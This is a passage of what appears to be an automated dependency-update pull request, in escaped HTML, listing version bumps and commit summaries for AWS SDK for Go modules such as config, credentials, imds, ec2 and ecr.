bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.21\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-04-10)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/connect/CHANGELOG.md#v1510-2023-04-10\"\u003ev1.51.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds the ability to configure an agent's routing profile to receive contacts from multiple channels at the same time via extending the UpdateRoutingProfileConcurrency, CreateRoutingProfile and DescribeRoutingProfile APIs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/ecs/CHANGELOG.md#v1250-2023-04-10\"\u003ev1.25.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for enabling FIPS compliance on Amazon ECS Fargate tasks\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/marketplacecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/marketplacecatalog/CHANGELOG.md#v1160-2023-04-10\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Added three new APIs to support resource sharing: GetResourcePolicy, PutResourcePolicy, and DeleteResourcePolicy. Added new OwnershipType field to ListEntities request to let users filter on entities that are shared with them. Increased max page size of ListEntities response from 20 to 50 results.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/mediaconvert\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/mediaconvert/CHANGELOG.md#v1350-2023-04-10\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Elemental MediaConvert SDK now supports conversion of 608 paint-on captions to pop-on captions for SCC sources.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/omics\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/omics/CHANGELOG.md#v130-2023-04-10\"\u003ev1.3.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Remove unexpected API changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/rekognition/CHANGELOG.md#v1240-2023-04-10\"\u003ev1.24.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for Face Liveness APIs in Amazon Rekognition. Updates UpdateStreamProcessor to return ResourceInUseException Exception. Minor updates to API documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-07)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/dlm\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/dlm/CHANGELOG.md#v1150-2023-04-07\"\u003ev1.15.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAnnouncement\u003c/strong\u003e: This release includes breaking changes for the timestamp trait on the data lifecycle management client.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated timestamp format for GetLifecyclePolicy API\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Correct timestamp type for data lifecycle manager.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/docdb\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/docdb/CHANGELOG.md#v1210-2023-04-07\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new parameter 'DBClusterParameterGroupName' to 'RestoreDBClusterFromSnapshot' API to associate the name of the DB cluster parameter group while performing restore.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/fsx\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/fsx/CHANGELOG.md#v1288-2023-04-07\"\u003ev1.28.8\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Amazon FSx for Lustre now supports creating data repository associations on Persistent_1 and Scratch_2 file systems.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/lambda\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/lambda/CHANGELOG.md#v1310-2023-04-07\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new Lambda InvokeWithResponseStream API to support streaming Lambda function responses. The release also adds a new InvokeMode parameter to Function Url APIs to control whether the response will be streamed or buffered.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/quicksight/CHANGELOG.md#v1340-2023-04-07\"\u003ev1.34.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release has two changes: adding the OR condition to tag-based RLS rules in CreateDataSet and UpdateDataSet; adding RefreshSchedule and Incremental RefreshProperties operations for users to programmatically configure SPICE dataset ingestions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/redshiftdata\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/redshiftdata/CHANGELOG.md#v1193-2023-04-07\"\u003ev1.19.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Update documentation of API descriptions as needed in support of temporary credentials with IAM identity.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/servicecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/servicecatalog/CHANGELOG.md#v1181-2023-04-07\"\u003ev1.18.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Updates description for property\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-06)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudformation\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/cloudformation/CHANGELOG.md#v1270-2023-04-06\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Including UPDATE_COMPLETE as a failed status for DeleteStack waiter.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/greengrassv2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/greengrassv2/CHANGELOG.md#v1220-2023-04-06\"\u003ev1.22.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for SUCCEEDED value in coreDeviceExecutionStatus field. Documentation updates for Greengrass V2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/proton\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/proton/CHANGELOG.md#v1210-2023-04-06\"\u003ev1.21.0\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fcc0f5daa41033b7a696f8cc5f53a9fc8696a274\"\u003e\u003ccode\u003efcc0f5d\u003c/code\u003e\u003c/a\u003e Release 2023-04-10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cd750e0b2188951c525ae7917d47ae9e2d013a1b\"\u003e\u003ccode\u003ecd750e0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1bc2f0514c73be727d3536e829fef18911bb45ae\"\u003e\u003ccode\u003e1bc2f05\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b964f5ca3ccae40ef8d7a56fd1b1ad040764b5fa\"\u003e\u003ccode\u003eb964f5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fd6901588c6d13a7889787328d0628134afd14cc\"\u003e\u003ccode\u003efd69015\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fae239abb72a392c50e05aa567b2e5cc2b93a10b\"\u003e\u003ccode\u003efae239a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2089\"\u003e#2089\u003c/a\u003e from aws/auditAccessibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/acf33a2872dbd9d3547842f38ccd38863048c121\"\u003e\u003ccode\u003eacf33a2\u003c/code\u003e\u003c/a\u003e Update aws-sdk-go-v2's comment codegened from Smithy Go's updated document sm...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/27360c189034eb456ebe7458bb8e019bc45d686c\"\u003e\u003ccode\u003e27360c1\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/30383d567f67c2a67b2b40a462a8c284c49d1796\"\u003e\u003ccode\u003e30383d5\u003c/code\u003e\u003c/a\u003e Release 2023-04-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/352f89c2d23ec6249a699c732ba5c9ae050f833f\"\u003e\u003ccode\u003e352f89c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.21\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.297.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/159f4d23fd3150aa3b14c231c434f46f42b72c2a\"\u003e\u003ccode\u003e159f4d2\u003c/code\u003e\u003c/a\u003e Release 2026-04-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/50223dc5168c2eb6316a108f23a7fd0803afba76\"\u003e\u003ccode\u003e50223dc\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/af25337605d0de4dc7f4141c6b1627ec31254415\"\u003e\u003ccode\u003eaf25337\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/277dc017b3b8ea944865ffb901eea3bf82121f5d\"\u003e\u003ccode\u003e277dc01\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/22bc35ca5a2af77140a47680f80873b4d61b6551\"\u003e\u003ccode\u003e22bc35c\u003c/code\u003e\u003c/a\u003e Release 2026-04-06\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9a35fedd65d0cdad42281199a7659146234893a1\"\u003e\u003ccode\u003e9a35fed\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/867b085ecb8579affb591d0e98bbe362376ce911\"\u003e\u003ccode\u003e867b085\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/61d367c87617dbe79f6cb8fe8809d09ce949d2fa\"\u003e\u003ccode\u003e61d367c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8560a07e8b7ed78b0962b6df18050500a32705e7\"\u003e\u003ccode\u003e8560a07\u003c/code\u003e\u003c/a\u003e Release 2026-04-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a5aafdff76b34debb6940077fc4377ed80d24805\"\u003e\u003ccode\u003ea5aafdf\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.297.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7c25c211744bdcff47a7203a7a894b1241f9da50\"\u003e\u003ccode\u003e7c25c21\u003c/code\u003e\u003c/a\u003e Release 2024-06-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b374423feaf0b04f01c7624b10915871e589b8a1\"\u003e\u003ccode\u003eb374423\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/923f54ea6016e1c70ad45ba0854e7361a72c3ba6\"\u003e\u003ccode\u003e923f54e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f3bdfcf190150f62a7a07a03bc32d9c58a68f2e\"\u003e\u003ccode\u003e5f3bdfc\u003c/code\u003e\u003c/a\u003e track changes for string_array endpoint parameters (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2699\"\u003e#2699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b4498c633741e24ff4930313610096601dc4036\"\u003e\u003ccode\u003e2b4498c\u003c/code\u003e\u003c/a\u003e Release 2024-06-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/332d372bb946f0d50cae58f9401b9c1244e4b818\"\u003e\u003ccode\u003e332d372\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9397b8d8c05eb1528910ba81881797e7c0e53d17\"\u003e\u003ccode\u003e9397b8d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/674e1e4412ce44325902125c935ce124d0bfaf4f\"\u003e\u003ccode\u003e674e1e4\u003c/code\u003e\u003c/a\u003e Release 2024-06-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/406eeb4367bab3ac49b75fbd2d842186e961f4f0\"\u003e\u003ccode\u003e406eeb4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/17bd894f3c3842d21d5963bc23213397557c3105\"\u003e\u003ccode\u003e17bd894\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca 